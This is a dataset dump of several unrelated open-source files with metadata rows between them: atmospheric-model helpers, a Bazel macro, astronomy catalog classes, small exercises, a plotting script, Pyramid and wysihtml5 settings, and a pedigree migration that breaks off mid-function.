z.attrs["long_name"] = "Altitude MSL Full Layer in Meters"
z.attrs["units"] = "m"
return z
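# --- Added illustration (not part of the original module) ---
# A hypothetical 1-D sketch of the height calculation in _calc_hgt: add the
# surface altitude to the lowest layer thickness and accumulate upward, which
# yields grid-top heights. The numbers are invented; the real function works
# on 4-D (time, z, y, x) data with a rolling sum along z.
def _example_layer_top_heights():
    import numpy as np

    surface_altitude_m = 100.0
    layer_thickness_m = np.array([50.0, 75.0, 100.0])  # surface to top
    dz = layer_thickness_m.copy()
    dz[0] += surface_altitude_m
    # np.cumsum plays the role of rolling(z=...).sum() in _calc_hgt
    return np.cumsum(dz)  # -> [150., 225., 325.] grid-top heights (m MSL)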
def _calc_pressure(dset):
"""Calculate the mid-layer pressure in Pa from surface pressure
and ak and bk constants.
Interface pressures are calculated by:
phalf(k) = a(k) + surfpres * b(k)
Mid layer pressures are calculated by:
pfull(k) = (phalf(k+1)-phalf(k))/log(phalf(k+1)/phalf(k))
Parameters
----------
dset : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.DataArray
Mid-layer pressure with attributes.
"""
pres = dset.dp_pa.copy().load() # Have to load into memory here so can assign levels.
srfpres = dset.surfpres_pa.copy().load()
for k in range(len(dset.z)):
pres_2 = dset.ak[k + 1] + srfpres * dset.bk[k + 1]
pres_1 = dset.ak[k] + srfpres * dset.bk[k]
pres[:, k, :, :] = (pres_2 - pres_1) / np.log(pres_2 / pres_1)
pres.name = "pres_pa_mid"
pres.attrs["units"] = "pa"
pres.attrs["long_name"] = "Pressure Mid Layer in Pa"
return pres
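# --- Added illustration (not part of the original module) ---
# A hypothetical single-interface worked example of the formulas used in
# _calc_pressure. The ak/bk constants and surface pressure are invented round
# numbers, not real RRFS-CMAQ hybrid coefficients.
def _example_mid_layer_pressure():
    import numpy as np

    ak = np.array([0.0, 500.0])  # Pa
    bk = np.array([1.0, 0.95])
    surfpres = 101325.0  # Pa
    # Interface pressures: phalf(k) = a(k) + surfpres * b(k)
    phalf = ak + surfpres * bk  # -> [101325.0, 96758.75]
    # Mid-layer pressure: pfull = (phalf(k+1) - phalf(k)) / log(phalf(k+1) / phalf(k))
    return (phalf[1] - phalf[0]) / np.log(phalf[1] / phalf[0])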
| 29.569356
| 112
| 0.508079
| 3,742
| 32,615
| 4.261358
| 0.14217
| 0.03029
| 0.034115
| 0.042142
| 0.538568
| 0.486266
| 0.452402
| 0.420544
| 0.390129
| 0.332372
| 0
| 0.034159
| 0.369891
| 32,615
| 1,102
| 113
| 29.596189
| 0.741764
| 0.252123
| 0
| 0.451237
| 0
| 0
| 0.164185
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032023
| false
| 0
| 0.007278
| 0
| 0.07278
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fc818c5836435c92ae4ef2d17b3e1e01d7c0fde
| 816
|
bzl
|
Python
|
build/build.bzl
|
abaer123/gitlab-agent
|
71c94d781ae2a7ae2851bb946c37fe01b1ed3da0
|
[
"MIT"
] | null | null | null |
build/build.bzl
|
abaer123/gitlab-agent
|
71c94d781ae2a7ae2851bb946c37fe01b1ed3da0
|
[
"MIT"
] | null | null | null |
build/build.bzl
|
abaer123/gitlab-agent
|
71c94d781ae2a7ae2851bb946c37fe01b1ed3da0
|
[
"MIT"
] | null | null | null |
load("@com_github_atlassian_bazel_tools//multirun:def.bzl", "command")
load("@bazel_skylib//lib:shell.bzl", "shell")
def copy_to_workspace(name, label, file_to_copy, workspace_relative_target_directory):
command(
name = name,
command = "//build:copy_to_workspace",
data = [label],
arguments = ["$(rootpaths %s)" % label, file_to_copy, workspace_relative_target_directory],
visibility = ["//visibility:public"],
)
# This macro expects the target directory for the file as an additional command-line argument.
def copy_absolute(name, label, file_to_copy):
command(
name = name,
command = "//build:copy_absolute",
data = [label],
arguments = ["$(rootpaths %s)" % label, file_to_copy],
visibility = ["//visibility:public"],
)
| 37.090909
| 99
| 0.658088
| 95
| 816
| 5.389474
| 0.421053
| 0.070313
| 0.085938
| 0.117188
| 0.488281
| 0.443359
| 0.322266
| 0.322266
| 0.167969
| 0
| 0
| 0
| 0.207108
| 816
| 21
| 100
| 38.857143
| 0.791345
| 0.107843
| 0
| 0.444444
| 0
| 0
| 0.282369
| 0.172176
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fc9836cfddecb88f1956951f281f1c8d40b8f81
| 4,471
|
py
|
Python
|
CAAPR/CAAPR_AstroMagic/PTS/pts/magic/catalog/catalog.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 7
|
2016-05-20T21:56:39.000Z
|
2022-02-07T21:09:48.000Z
|
CAAPR/CAAPR_AstroMagic/PTS/pts/magic/catalog/catalog.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 1
|
2019-03-21T16:10:04.000Z
|
2019-03-22T17:21:56.000Z
|
CAAPR/CAAPR_AstroMagic/PTS/pts/magic/catalog/catalog.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 1
|
2020-05-19T16:17:17.000Z
|
2020-05-19T16:17:17.000Z
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.magic.catalog.catalog Contains the GalacticCatalog and StellarCatalog classes.
# -----------------------------------------------------------------
# Ensure Python 3 functionality
from __future__ import absolute_import, division, print_function
# Import the relevant PTS classes and modules
from ..tools import catalogs
from ...core.tools import introspection, tables
from ...core.tools import filesystem as fs
# -----------------------------------------------------------------
catalogs_user_path = fs.join(introspection.pts_user_dir, "catalogs")
# -----------------------------------------------------------------
class GalacticCatalog(object):
"""
This class ...
"""
def __init__(self, frame_or_wcs):
"""
The constructor ...
:param frame_or_wcs:
:return:
"""
# Create the catalogs user directory if necessary
if not fs.is_directory(catalogs_user_path): fs.create_directory(catalogs_user_path)
# Determine the path to the 'galaxies' catalog directory
galaxies_catalog_path = fs.join(catalogs_user_path, "galaxies")
# Create the catalogs/galaxies directory if necessary
if not fs.is_directory(galaxies_catalog_path): fs.create_directory(galaxies_catalog_path)
# Get the center coordinate and the range of RA and DEC
center, ra_span, dec_span = frame_or_wcs.coordinate_range
# Generate a unique string for the coordinate range
name = str(center) + "_" + str(ra_span) + "_" + str(dec_span)
# Determine the path to the catalog file
self.path = fs.join(galaxies_catalog_path, name + ".cat")
# Check whether the local file exists
if not fs.is_file(self.path):
# Get the table
self.table = catalogs.create_galaxy_catalog(frame_or_wcs)
# Save the table
tables.write(self.table, self.path, format="ascii.ecsv")
# Load the table
else: self.table = tables.from_file(self.path, format="ascii.ecsv")
# -----------------------------------------------------------------
def saveto(self, path):
"""
This function ...
:param path:
:return:
"""
tables.write(self.table, path, format="ascii.ecsv")
# -----------------------------------------------------------------
class StellarCatalog(object):
"""
This class ...
"""
def __init__(self, frame_or_wcs, catalog_names="II/246"):
"""
This function ...
:param frame_or_wcs:
:param catalog_names:
:return:
"""
# Create the catalogs user directory if necessary
if not fs.is_directory(catalogs_user_path): fs.create_directory(catalogs_user_path)
# Determine the path to the 'stars' catalog directory
stars_catalog_path = fs.join(catalogs_user_path, "stars")
# Create the catalogs/stars directory if necessary
if not fs.is_directory(stars_catalog_path): fs.create_directory(stars_catalog_path)
# Get the center coordinate and the range of RA and DEC
center, ra_span, dec_span = frame_or_wcs.coordinate_range
# Generate a unique string for the coordinate range
name = str(center) + "_" + str(ra_span) + "_" + str(dec_span)
# Determine the path to the catalog file
self.path = fs.join(stars_catalog_path, name + ".cat")
# Check whether the local file exists
if not fs.is_file(self.path):
# Get the table
self.table = catalogs.create_star_catalog(frame_or_wcs, catalog_names)
# Save the table
tables.write(self.table, self.path, format="ascii.ecsv")
# Load the table
else: self.table = tables.from_file(self.path, format="ascii.ecsv")
# -----------------------------------------------------------------
def saveto(self, path):
"""
This function ...
:param path:
:return:
"""
tables.write(self.table, path, format="ascii.ecsv")
# -----------------------------------------------------------------
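# -----------------------------------------------------------------
# Added illustration (not part of the original module): a hypothetical usage
# sketch. "frame" stands for any object exposing a coordinate_range property
# (a PTS frame or WCS); the output paths below are invented.
def _example_catalog_usage(frame):
    # Build (or load from the local catalogs cache) the galaxy catalog
    galactic = GalacticCatalog(frame)
    # Stellar catalog, querying the default "II/246" (2MASS) catalog
    stellar = StellarCatalog(frame)
    # Both tables can also be written elsewhere as ECSV files
    galactic.saveto("galaxies_copy.cat")
    stellar.saveto("stars_copy.cat")
    return galactic.table, stellar.table
# -----------------------------------------------------------------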
| 31.485915
| 97
| 0.547976
| 482
| 4,471
| 4.887967
| 0.219917
| 0.046689
| 0.033956
| 0.02292
| 0.702037
| 0.663837
| 0.663837
| 0.635823
| 0.603565
| 0.573005
| 0
| 0.001465
| 0.236636
| 4,471
| 141
| 98
| 31.70922
| 0.688544
| 0.426303
| 0
| 0.484848
| 0
| 0
| 0.042416
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121212
| false
| 0
| 0.121212
| 0
| 0.30303
| 0.030303
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fcda78cf21f154d5256341e1d4f6994551d5ce9
| 858
|
py
|
Python
|
exercicio9.py
|
isaacfelipe1/Estrutura_De_Dados_Um_UEA
|
79b693d186154b54b7bb0c2dac10cd4cf9886bb3
|
[
"Apache-2.0"
] | null | null | null |
exercicio9.py
|
isaacfelipe1/Estrutura_De_Dados_Um_UEA
|
79b693d186154b54b7bb0c2dac10cd4cf9886bb3
|
[
"Apache-2.0"
] | null | null | null |
exercicio9.py
|
isaacfelipe1/Estrutura_De_Dados_Um_UEA
|
79b693d186154b54b7bb0c2dac10cd4cf9886bb3
|
[
"Apache-2.0"
] | null | null | null |
#9-Write a program that reads an indeterminate number of grades. After this data entry, do the following:
#. Show how many grades were read.
#. Display all the grades in the order they were entered.
#. Calculate and show the average of the grades.
#. Calculate and show how many grades are above the calculated average.
list=[]
acima_media=[]
notas=float(input("Informe suas notas(-1 para sair\n"))
while(notas>=0):
list.append(notas)
notas=float(input("Informe suas notas(-1 para sair\n"))
media=sum(list)/len(list)
for i, word in enumerate(list):
if word>media:
acima_media+=[word]
soma=len(acima_media)
print('na posição',i,'foi digitado o número ',word)
print(f' A quantidades de notas que foram informados: {len(list)}')
print()
print('=>'*30)
print(f'A média das notas foi {media}')
print(f'{soma}')
print(acima_media)
| 35.75
| 105
| 0.708625
| 141
| 858
| 4.283688
| 0.460993
| 0.046358
| 0.056291
| 0.062914
| 0.215232
| 0.135762
| 0.135762
| 0.135762
| 0.135762
| 0.135762
| 0
| 0.008345
| 0.162005
| 858
| 24
| 106
| 35.75
| 0.831711
| 0.361305
| 0
| 0.111111
| 0
| 0
| 0.354779
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.388889
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fcf633d461876ef2ed0512751ad534119c618aa
| 1,249
|
py
|
Python
|
src/resnet_datasize_plot.py
|
chloechsu/nanoparticle
|
5e78fe33c2d562aa31d5e458be0dbf52813f20b1
|
[
"MIT"
] | 1
|
2021-04-04T23:07:59.000Z
|
2021-04-04T23:07:59.000Z
|
src/resnet_datasize_plot.py
|
chloechsu/nanoparticle
|
5e78fe33c2d562aa31d5e458be0dbf52813f20b1
|
[
"MIT"
] | null | null | null |
src/resnet_datasize_plot.py
|
chloechsu/nanoparticle
|
5e78fe33c2d562aa31d5e458be0dbf52813f20b1
|
[
"MIT"
] | 3
|
2021-01-13T14:50:42.000Z
|
2022-03-20T16:19:52.000Z
|
import argparse
import csv
import glob
import os
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
sns.set()
shapes = ['TriangPrismIsosc', 'parallelepiped', 'sphere', 'wire']
def main():
trainsizes = []
avg_acc = []
for f in glob.glob('model/resnet18-all-Adam-lr_0.0001*_test_metrics.csv'):
if 'joint' in f or 'nofeature' in f:
continue
print(f)
trainsize = f.split('-')[4]
assert trainsize.startswith('trainsize')
if int(trainsize[10:]) in trainsizes:
print(trainsize[10:])
trainsizes.append(int(trainsize[10:]))
df = pd.read_csv(f)
avg_acc.append(np.mean([df.iloc[0]['accuracy/' + s] for s in shapes]))
aug_ratio = [int((t - 7950.) / 7950.) for t in trainsizes]
print(aug_ratio)
hues = [str(t == 19) for t in aug_ratio]
plt.figure(figsize=(8, 5))
ax = sns.scatterplot(x=aug_ratio[::-1], y=avg_acc[::-1], marker='+',
hue=hues[::-1], s=80)
ax.legend_.remove()
plt.xlabel('Data Augmentation Ratio', fontsize=15)
plt.ylabel('ResNet18-1D Top-1 Accuracy', fontsize=15)
plt.savefig('plots/resnet18_datasize_plot.png')
if __name__ == "__main__":
main()
| 29.046512
| 78
| 0.622898
| 178
| 1,249
| 4.247191
| 0.522472
| 0.042328
| 0.037037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.043254
| 0.222578
| 1,249
| 42
| 79
| 29.738095
| 0.735324
| 0
| 0
| 0
| 0
| 0
| 0.171337
| 0.066453
| 0
| 0
| 0
| 0
| 0.027778
| 1
| 0.027778
| false
| 0
| 0.222222
| 0
| 0.25
| 0.083333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fd0efe4c22b97942030348d8ad7858091215264
| 1,482
|
py
|
Python
|
pyramid_bootstrap/__init__.py
|
keitheis/pyramid_bootstrap
|
e8d6e8b9081427bca264d16a679571c35d3527e5
|
[
"BSD-3-Clause"
] | null | null | null |
pyramid_bootstrap/__init__.py
|
keitheis/pyramid_bootstrap
|
e8d6e8b9081427bca264d16a679571c35d3527e5
|
[
"BSD-3-Clause"
] | null | null | null |
pyramid_bootstrap/__init__.py
|
keitheis/pyramid_bootstrap
|
e8d6e8b9081427bca264d16a679571c35d3527e5
|
[
"BSD-3-Clause"
] | 1
|
2018-04-12T14:27:52.000Z
|
2018-04-12T14:27:52.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Keith Yang'
__email__ = 'yang@keitheis.org'
__version__ = '0.1.0'
from pyramid.settings import asbool
from .bootstrap import BootstrapFactory
def includeme(config):
DEFAULT = {
'versions': '3.0.3',
'use_min_file': True,
'use_cdn': False,
'static_path': {
'cdn': "//netdna.bootstrapcdn.com/bootstrap/",
'local': 'bootstrap/'
},
'cache_max_age': 3600,
}
settings = config.get_settings()
setting_prefix = "bootstrap."
def get_setting(attr, default=None):
return settings.get(setting_prefix + attr, default)
versions = get_setting('versions', DEFAULT['versions'])
use_min_file = asbool(get_setting("use_min_file", DEFAULT['use_min_file']))
bootstraps = BootstrapFactory.build_bootstraps(versions, use_min_file)
use_cdn = asbool(get_setting("use_cdn"))
if use_cdn:
static_path = DEFAULT['static_path']['cdn']
else:
static_path = get_setting('static_path',
DEFAULT['static_path']['local'])
cache_max_age = get_setting('cache_max_age', DEFAULT['cache_max_age'])
for version in bootstraps:
config.add_static_view(static_path + version,
"pyramid_bootstrap:static/{}".format(version),
cache_max_age=cache_max_age)
config.scan('pyramid_bootstrap.event_subscribers')
| 30.244898
| 79
| 0.625506
| 169
| 1,482
| 5.130178
| 0.372781
| 0.080738
| 0.076125
| 0.041522
| 0.062284
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009857
| 0.246964
| 1,482
| 48
| 80
| 30.875
| 0.767025
| 0.02834
| 0
| 0
| 0
| 0
| 0.228095
| 0.06815
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057143
| false
| 0
| 0.057143
| 0.028571
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fd224ae58a35451a109abe33921bfe534a36c4b
| 3,043
|
py
|
Python
|
Data Structures/Linked List/Merge Two Sorted Linked Lists/merge_two_sorted_linked_lists.py
|
brianchiang-tw/HackerRank
|
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
|
[
"MIT"
] | 2
|
2020-05-28T07:15:00.000Z
|
2020-07-21T08:34:06.000Z
|
Data Structures/Linked List/Merge Two Sorted Linked Lists/merge_two_sorted_linked_lists.py
|
brianchiang-tw/HackerRank
|
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
|
[
"MIT"
] | null | null | null |
Data Structures/Linked List/Merge Two Sorted Linked Lists/merge_two_sorted_linked_lists.py
|
brianchiang-tw/HackerRank
|
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
|
[
"MIT"
] | null | null | null |
#!/bin/python3
import math
import os
import random
import re
import sys
class SinglyLinkedListNode:
def __init__(self, node_data):
self.data = node_data
self.next = None
class SinglyLinkedList:
def __init__(self):
self.head = None
self.tail = None
def insert_node(self, node_data):
node = SinglyLinkedListNode(node_data)
if not self.head:
self.head = node
else:
self.tail.next = node
self.tail = node
def print_singly_linked_list(node, sep, fptr):
while node:
fptr.write(str(node.data))
node = node.next
if node:
fptr.write(sep)
# Complete the mergeLists function below.
#
# For your reference:
#
# SinglyLinkedListNode:
# int data
# SinglyLinkedListNode next
#
#
def mergeLists(head1, head2):
# dummy head node
head_of_merge = SinglyLinkedListNode( 0 )
merge_point = head_of_merge
cur_1, cur_2 = head1, head2
while( cur_1 is not None and cur_2 is not None):
if cur_1.data <= cur_2.data:
new_node = SinglyLinkedListNode( cur_1.data )
# cur_1 move forward
cur_1 = cur_1.next
else:
new_node = SinglyLinkedListNode( cur_2.data )
# cur_2 move forward
cur_2 = cur_2.next
# add into merged linked list
merge_point.next = new_node
# merge_point move forward
merge_point = merge_point.next
# linked list 1 is empty, dump linked list 2 into merged linked list
while cur_2 is not None:
new_node = SinglyLinkedListNode( cur_2.data )
# cur_2 move forward
cur_2 = cur_2.next
# add into merged linked list
merge_point.next = new_node
# merge_point move forward
merge_point = merge_point.next
# linked list 2 is empty, dump linked list 1 into merged linked list
while cur_1 is not None:
new_node = SinglyLinkedListNode( cur_1.data )
# cur_1 move forward
cur_1 = cur_1.next
# add into merged linked list
merge_point.next = new_node
# merge_point move forward
merge_point = merge_point.next
# real head node of merged linked list = next of dummy head node
real_head = head_of_merge.next
return real_head
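# Added illustration (not part of the original solution): a tiny hypothetical
# check of mergeLists on two short sorted lists; the values are invented.
def _example_merge():
    a = SinglyLinkedList()
    for v in (1, 3, 5):
        a.insert_node(v)
    b = SinglyLinkedList()
    for v in (2, 4):
        b.insert_node(v)
    node = mergeLists(a.head, b.head)
    out = []
    while node:
        out.append(node.data)
        node = node.next
    return out  # -> [1, 2, 3, 4, 5]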
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
tests = int(input())
for tests_itr in range(tests):
llist1_count = int(input())
llist1 = SinglyLinkedList()
for _ in range(llist1_count):
llist1_item = int(input())
llist1.insert_node(llist1_item)
llist2_count = int(input())
llist2 = SinglyLinkedList()
for _ in range(llist2_count):
llist2_item = int(input())
llist2.insert_node(llist2_item)
llist3 = mergeLists(llist1.head, llist2.head)
print_singly_linked_list(llist3, ' ', fptr)
fptr.write('\n')
fptr.close()
| 21.58156
| 72
| 0.612882
| 393
| 3,043
| 4.508906
| 0.216285
| 0.073363
| 0.047404
| 0.056433
| 0.386005
| 0.354402
| 0.312077
| 0.301919
| 0.301919
| 0.301919
| 0
| 0.023889
| 0.312192
| 3,043
| 140
| 73
| 21.735714
| 0.822742
| 0.192573
| 0
| 0.231884
| 0
| 0
| 0.009453
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072464
| false
| 0
| 0.072464
| 0
| 0.188406
| 0.028986
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3957f752a49e9fed33ab81dcc197e7f08498b9c3
| 4,856
|
py
|
Python
|
wysihtml5/conf/defaults.py
|
vkuryachenko/django-wysihtml5
|
5f6fa86ecbfeccfae61b06386f1f6f44dfca94c0
|
[
"BSD-2-Clause"
] | 4
|
2015-03-24T20:41:31.000Z
|
2021-05-24T15:41:16.000Z
|
wysihtml5/conf/defaults.py
|
vkuryachenko/django-wysihtml5
|
5f6fa86ecbfeccfae61b06386f1f6f44dfca94c0
|
[
"BSD-2-Clause"
] | 1
|
2017-08-06T18:17:53.000Z
|
2017-08-06T18:17:53.000Z
|
wysihtml5/conf/defaults.py
|
vkuryachenko/django-wysihtml5
|
5f6fa86ecbfeccfae61b06386f1f6f44dfca94c0
|
[
"BSD-2-Clause"
] | 3
|
2015-05-14T15:06:21.000Z
|
2021-05-24T15:43:05.000Z
|
#-*- coding: utf-8 -*-
from django.conf import settings
WYSIHTML5_EDITOR = {
# Give the editor a name, the name will also be set as class
# name on the iframe and on the iframe's body
'name': 'null',
# Whether the editor should look like the textarea (by adopting styles)
'style': 'true',
# Id of the toolbar element, pass false if you don't want
# any toolbar logic
'toolbar': 'null',
# Whether URLs entered by the user should automatically become
# clickable links
'autoLink': 'true',
# Object which includes parser rules (set this to
# examples/rules/spec.json or your own spec, otherwise only span
# tags are allowed!)
'parserRules': 'wysihtml5ParserRules',
# Parser method to use when the user inserts content via copy & paste
'parser': 'wysihtml5.dom.parse || Prototype.K',
# Class name which should be set on the contentEditable element in
# the created sandbox iframe, can be styled via the 'stylesheets' option
'composerClassName': '"wysihtml5-editor"',
# Class name to add to the body when the wysihtml5 editor is supported
'bodyClassName': '"wysihtml5-supported"',
# By default wysihtml5 will insert <br> for line breaks, set this to
# false to use <p>
'useLineBreaks': 'true',
# Array (or single string) of stylesheet urls to be loaded in the
# editor's iframe
'stylesheets': '["%s"]' % (settings.STATIC_URL +
"wysihtml5/css/stylesheet.css"),
# Placeholder text to use, defaults to the placeholder attribute
# on the textarea element
'placeholderText': 'null',
# Whether the composer should allow the user to manually resize
# images, tables etc.
'allowObjectResizing': 'true',
# Whether the rich text editor should be rendered on touch devices
# (wysihtml5 >= 0.3.0 comes with basic support for iOS 5)
'supportTouchDevices': 'true'
}
WYSIHTML5_TOOLBAR = {
"formatBlockHeader": {
"active": True,
"command_name": "formatBlock",
"render_icon": "wysihtml5.widgets.render_formatBlockHeader_icon"
},
"formatBlockParagraph": {
"active": True,
"command_name": "formatBlock",
"render_icon": "wysihtml5.widgets.render_formatBlockParagraph_icon"
},
"bold": {
"active": True,
"command_name": "bold",
"render_icon": "wysihtml5.widgets.render_bold_icon"
},
"italic": {
"active": True,
"command_name": "italic",
"render_icon": "wysihtml5.widgets.render_italic_icon"
},
"underline": {
"active": True,
"command_name": "underline",
"render_icon": "wysihtml5.widgets.render_underline_icon"
},
"justifyLeft": {
"active": True,
"command_name": "justifyLeft",
"render_icon": "wysihtml5.widgets.render_justifyLeft_icon"
},
"justifyCenter": {
"active": True,
"command_name": "justifyCenter",
"render_icon": "wysihtml5.widgets.render_justifyCenter_icon"
},
"justifyRight": {
"active": True,
"command_name": "justifyRight",
"render_icon": "wysihtml5.widgets.render_justifyRight_icon"
},
"insertOrderedList": {
"active": True,
"command_name": "insertOrderedList",
"render_icon": "wysihtml5.widgets.render_insertOrderedList_icon"
},
"insertUnorderedList": {
"active": True,
"command_name": "insertUnorderedList",
"render_icon": "wysihtml5.widgets.render_insertUnorderedList_icon"
},
"insertImage": {
"active": True,
"command_name": "insertImage",
"render_icon": "wysihtml5.widgets.render_insertImage_icon",
"render_dialog": "wysihtml5.widgets.render_insertImage_dialog"
},
"createLink": {
"active": True,
"command_name": "createLink",
"render_icon": "wysihtml5.widgets.render_createLink_icon",
"render_dialog": "wysihtml5.widgets.render_createLink_dialog"
},
"insertHTML": {
"active": True,
"command_name": "insertHTML",
"command_value": "<blockquote>quote</blockquote>",
"render_icon": "wysihtml5.widgets.render_insertHTML_icon"
},
"foreColor": {
"active": True,
"command_name": "foreColor",
"render_icon": "wysihtml5.widgets.render_foreColor_icon"
},
"changeView": {
"active": True,
"command_name": "change_view",
"render_icon": "wysihtml5.widgets.render_changeView_icon"
},
}
# This is necessary to protect the field of content in cases where
# the user disables JavaScript in the browser, so that Wysihtml5 can't
# do the filter job.
WYSIHTML5_ALLOWED_TAGS = ('h1 h2 h3 h4 h5 h6 div p b i u'
' ul ol li span img a blockquote')
| 36.787879
| 76
| 0.635914
| 523
| 4,856
| 5.764818
| 0.380497
| 0.090216
| 0.124046
| 0.104478
| 0.205638
| 0.067662
| 0.042454
| 0.042454
| 0.042454
| 0.042454
| 0
| 0.010953
| 0.247941
| 4,856
| 131
| 77
| 37.068702
| 0.814622
| 0.281301
| 0
| 0.171717
| 0
| 0
| 0.556326
| 0.22877
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010101
| 0
| 0.010101
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
395a96908738ec18c9180da4437fee979a2a2992
| 6,496
|
py
|
Python
|
protocols/migration/migration_participant_100_to_reports_300.py
|
Lucioric2000/GelReportModels
|
1704cdea3242d5b46c8b81ef46553ccae2799435
|
[
"Apache-2.0"
] | 14
|
2016-09-22T10:10:01.000Z
|
2020-09-23T11:40:37.000Z
|
protocols/migration/migration_participant_100_to_reports_300.py
|
Lucioric2000/GelReportModels
|
1704cdea3242d5b46c8b81ef46553ccae2799435
|
[
"Apache-2.0"
] | 159
|
2016-09-22T11:08:46.000Z
|
2021-09-29T13:55:52.000Z
|
protocols/migration/migration_participant_100_to_reports_300.py
|
Lucioric2000/GelReportModels
|
1704cdea3242d5b46c8b81ef46553ccae2799435
|
[
"Apache-2.0"
] | 17
|
2016-09-20T13:31:58.000Z
|
2020-10-19T04:58:19.000Z
|
from protocols import reports_3_0_0 as participant_old
from protocols import participant_1_0_0
from protocols.migration import BaseMigration
class MigrationParticipants100ToReports(BaseMigration):
old_model = participant_1_0_0
new_model = participant_old
def migrate_pedigree(self, old_instance):
"""
:param old_instance: org.gel.models.participant.avro.Pedigree 1.0.0
:rtype: org.gel.models.report.avro RDParticipant.Pedigree 3.0.0
"""
new_instance = self.convert_class(self.new_model.Pedigree, old_instance)
new_instance.versionControl = self.new_model.VersionControl()
new_instance.gelFamilyId = old_instance.familyId
new_instance.participants = self.convert_collection(
old_instance.members, self._migrate_member_to_participant, family_id=old_instance.familyId)
return self.validate_object(object_to_validate=new_instance, object_type=self.new_model.Pedigree)
def _migrate_member_to_participant(self, old_member, family_id):
new_instance = self.convert_class(self.new_model.RDParticipant, old_member)
new_instance.gelFamilyId = family_id
new_instance.pedigreeId = old_member.pedigreeId or 0
new_instance.isProband = old_member.isProband or False
new_instance.gelId = old_member.participantId
new_instance.sex = self._migrate_sex(old_sex=old_member.sex)
new_instance.personKaryotipicSex = self._migrate_person_karyotypic_sex(old_pks=old_member.personKaryotypicSex)
if old_member.yearOfBirth is not None:
new_instance.yearOfBirth = str(old_member.yearOfBirth)
new_instance.adoptedStatus = self._migrate_adopted_status(old_status=old_member.adoptedStatus)
new_instance.lifeStatus = self._migrate_life_status(old_status=old_member.lifeStatus)
new_instance.affectionStatus = self._migrate_affection_status(old_status=old_member.affectionStatus)
new_instance.hpoTermList = self.convert_collection(
old_member.hpoTermList, self._migrate_hpo_term, default=[])
new_instance.samples = self.convert_collection(old_member.samples, lambda s: s .sampleId)
new_instance.versionControl = self.new_model.VersionControl()
if old_member.consentStatus is None:
new_instance.consentStatus = self.new_model.ConsentStatus(
programmeConsent=True, primaryFindingConsent=True, secondaryFindingConsent=True,
carrierStatusConsent=True
)
if old_member.ancestries is None:
